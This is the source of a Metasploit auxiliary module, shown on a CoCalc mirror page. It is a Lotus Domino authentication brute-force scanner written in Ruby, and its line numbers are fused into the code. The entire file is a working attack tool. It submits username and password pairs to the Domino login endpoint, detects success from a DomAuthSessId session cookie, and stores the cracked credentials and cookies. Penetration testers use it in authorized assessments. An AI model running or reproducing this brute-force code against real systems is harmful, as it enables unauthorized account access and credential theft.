CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::AuthBrute8include Msf::Auxiliary::Report9include Msf::Auxiliary::Scanner101112def initialize13super(14'Name' => 'Lotus Domino Brute Force Utility',15'Description' => 'Lotus Domino Authentication Brute Force Utility',16'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',17'License' => MSF_LICENSE18)1920end2122def run_host(ip)2324each_user_pass { |user, pass|25do_login(user, pass)26}2728end2930def report_cred(opts)31service_data = {32address: opts[:ip],33port: opts[:port],34service_name: opts[:service_name],35protocol: 'tcp',36workspace_id: myworkspace_id37}3839credential_data = {40origin_type: :service,41module_fullname: fullname,42username: opts[:user],43private_data: opts[:password],44private_type: :password45}.merge(service_data)4647login_data = {48last_attempted_at: Time.now,49core: create_credential(credential_data),50status: Metasploit::Model::Login::Status::SUCCESSFUL,51proof: opts[:proof]52}.merge(service_data)5354create_credential_login(login_data)55end5657def do_login(user=nil,pass=nil)58post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"59vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'")6061begin6263res = send_request_cgi({64'method' => 'POST',65'uri' => '/names.nsf?Login',66'data' => post_data,67}, 20)6869if res and res.code == 30270if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)71print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")72report_cred(73ip: rhost,74port: rport,75service_name: (ssl ? "https" : "http"),76user: user,77password: pass,78proof: "WEBAPP=\"Lotus Domino\", VHOST=#{vhost}, COOKIE=#{res.get_cookies}"79)80return :next_user81end8283print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")84return :abort8586elsif res.body.to_s =~ /names.nsf\?Login/87vprint_error("http://#{vhost}:#{rport} - Lotus Domino - Failed to login as '#{user}'")88return89else90print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response") if res91return :abort92end9394rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout95rescue ::Timeout::Error, ::Errno::EPIPE96end97end98end99100101